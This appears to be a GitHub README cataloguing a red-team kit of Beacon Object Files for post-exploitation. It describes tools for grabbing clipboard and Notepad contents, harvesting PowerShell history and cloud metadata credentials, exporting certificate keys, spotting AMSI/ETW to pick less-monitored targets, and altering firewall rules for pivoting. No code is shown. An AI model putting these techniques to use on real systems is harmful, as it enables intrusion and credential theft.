Adrenaline BOF Kit
June 22, 2026 ยท View on GitHub
A C2-agnostic collection of Beacon Object Files (BOFs) for red team and offensive security operations. BOFs are organized by attack chain phase and designed to be small, modular, and automation-friendly for use in reconnaissance, enumeration, and post-exploitation workflows.
Collection
| BOF | Use |
|---|---|
| ai_surface | Maps AI tooling on Windows developer endpoints and highlights their configuration artifacts that may expose server definitions, commands, arguments, and embedded credentials. |
| clipboard_grab | Retrieves text data from the Windows clipboard using Win32 APIs and returns the contents to the callback. Original Code Credits: @rvrsh3ll |
| ide_extension_surface | Enumerates VS Code, Cursor, Windsurf, Zed, Insiders, OSS, and server/remote extension manifests from per-user profile roots and summarizes extension identity, activation events, and capability signals. |
| powershell_history | Collects PowerShell history artifacts from default PSReadLine and transcript locations. Useful for locating credentials or infrastructure. |
| window_handles_enum | Enumerates window handles across all system processes and uses a legitimate window handle to access the clipboard. |
Community
| BOF | Use |
|---|---|
| notepad_grab | Extracts and returns plain text directly from open Notepad windows by reading memory, allowing operators to recover unsaved or in-memory notes. Useful for data collection from live endpoints. Original Source: NoteThief |
| schtask_enum | Enumerates scheduled tasks on Windows systems using the Task Scheduler COM interface. Provides a summary of tasks including their state, schedule, and configuration without overwhelming the beacon with XML data. Original Source: TrustedSec CS-Situational-Awareness-BOF |
| net_use | Add, list, or remove mapped drives via MPR (Modernized to manage memory properly, avoiding crashing) Original Source: TrustedSec CS-Situational-Awareness-BOF |
| session_view | Enumerates Windows Terminal Services sessions, displaying session IDs, usernames, domains, connection states, and session LUIDs. Original Source: SessionView by lsecqt |
Credential Access
| BOF | Use |
|---|---|
| certstore_loot | Enumerates local certificate stores to find certificates with exportable private keys and provides you with the path to export them. |
| cloud_metadata_check | Probes cloud-local metadata services for AWS, Azure, and GCP from the current process, reporting provider identity, instance context, and bounded credential snippets when reachable. |
| process_tokens_list | Enumerates accessible tokens from running processes, showing user context, token type (primary/impersonation), and impersonation level. Supports optional filtering by PID or process name. SeDebugPrivilege is disabled by default for OPSEC. |
Discovery
| BOF | Use |
|---|---|
| amsi_etw_detect | Checks for AMSI and ETW presence in the current process by detecting loaded DLLs and ETW-related exports. Useful for picking targets with less security activity when applied broadly. |
| app_count | Counts the number of installed applications via the registry, de-duplicates, and prints. Applied to a large number of beacons, allows us to infer things about a device based on app count differences. |
| applocker_policy | Enumerates AppLocker policy configurations, rule collections, and enforcement modes by scanning the relevant registry keys. |
| asr_status | Enumerates Windows Defender Attack Surface Reduction (ASR) rules from registry locations to identify which ASR rules are configured, their enforcement state (Block/Audit/Warn/Disabled), and the policy source (Intune/MDM vs Group Policy). |
| bitlocker_status | Enumerates BitLocker encryption status, policy configurations, and recovery key backup locations by scanning registry keys. |
| mdm_policy_artifacts | Uses a scoring model to assess MDM enrollment posture on Windows systems by evaluating indicators including join state, scheduled tasks, policy configuration, and enrollment artifacts. |
| netjoin_query | Queries Windows domain join information and workstation details, identifying if the system is domain-joined or in a workgroup. |
| power_state | Identifies host form factor as Laptop, Desktop, Tablet, Server, Embedded, or Unknown using SMBIOS chassis data with a power-status fallback. |
| proxy_enum | Enumerates Windows proxy configuration state across WinINET, WinHTTP, policy keys, environment variables, WPAD indicators, Chrome settings, and .NET defaultProxy values. |
| tray_scout | Reports the taskbar host executable and enumerates system tray notification icon tooltips, with optional full image paths for the host and each icon's owning process. |
| user_idle | Gets user idle time since last input and GUI resource usage (GDI/USER handles) in the current process for timing intelligence. |
| wallpaper_enum | Enumerates the current desktop wallpaper path for each attached monitor using the modern IDesktopWallpaper COM interface. Centralized wallpapers are sometimes on internal SMB shares or imaging servers, revealing network paths, domain trusts, and policy enforcement without touching disk or the network. |
| wef_detect | Detects Windows Event Forwarding (WEF) configuration, which indicates centralized logging. If found, indicates security events are being forwarded to a central server. |
| window_list | Enumerates the titles of all visible windows on the current user's desktop, optionally including Process IDs (PIDs). |
| wsc_status | Queries Windows Security Center health status, including Anti-Virus, Firewall, Anti-Spyware, WSC Service, Auto-Update, Internet Settings, and User Account Control. |
| win_version | This BOF queries the registry and system APIs to provide a concise but detailed overview of the Windows installation. |
Execution
| BOF | Use |
|---|---|
| com_probe | Probe whether a COM object can be instantiated from a given CLSID. |
| firewall_rule | Add, remove, or query Windows Firewall rules via the COM API (INetFwPolicy2) without spawning netsh.exe or cmd.exe. Useful for pivoting inside networks. |
| service_control | Manages local Windows services via SCM: query (capped list or single service), create, start, stop, delete, and configure failure actions. Elevated rights usually required for changes. |
| wevt_logon_enum | Enumerates recent Security log (successful/failed) logon events (Event IDs 4624,4625,4672) via the wevtapi API and prints remote workstation name/IP plus the target username. |
Connect with me:
DISCLAIMER: The creators and contributors of this repository accept no liability for any loss, damage, or consequences resulting from the use of the information or code contained in this repo. By utilizing this repo, you acknowledge and accept full responsibility for your actions. Use at your own risk.